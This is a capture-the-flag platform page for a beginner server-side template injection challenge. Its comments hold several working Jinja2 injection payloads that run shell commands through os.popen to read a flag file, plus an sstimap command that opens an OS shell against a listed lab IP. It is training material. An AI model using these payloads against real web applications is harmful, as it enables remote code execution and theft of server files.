Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16510
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
路冥离 攻破了该题 11小时前
pipizhu 攻破了该题 1天前
极品老学生 攻破了该题 4天前
kella 攻破了该题 4天前
Tomato薯条 攻破了该题 4天前
2117783710 攻破了该题 5天前
adminclc 攻破了该题 5天前
TrySec 攻破了该题 6天前
Q-Larry 攻破了该题 7天前
wbq012 攻破了该题 7天前
aqwzaa 攻破了该题 8天前
ctf菜鸟 攻破了该题 9天前
粉红色的-毛 攻破了该题 9天前
fu11dreamer 攻破了该题 10天前
lj 攻破了该题 11天前
shengood 攻破了该题 13天前
ndzdb 攻破了该题 13天前
fish12138 攻破了该题 17天前
xxhacker 攻破了该题 17天前
评论
pipizhu 1天前
举报
?flag={{lipsum.__globals__['os'].popen('cat /app/flag').read()}}获取flag
bugku2026 1月前
举报
先通过?flag={{self.__dict__}}发现拥有lipsum,再通过?flag={{lipsum.__globals__.os.popen("cat /app/flag").read()}}获取flag
r1ng_13 2月前
举报
焚靖直接秒,比上一个SSTI还简单
网恋秀牛子被录屏导致自卑 4月前
举报
/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}
liutong27 8月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 11月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 1年前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 1年前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 1年前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 1年前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}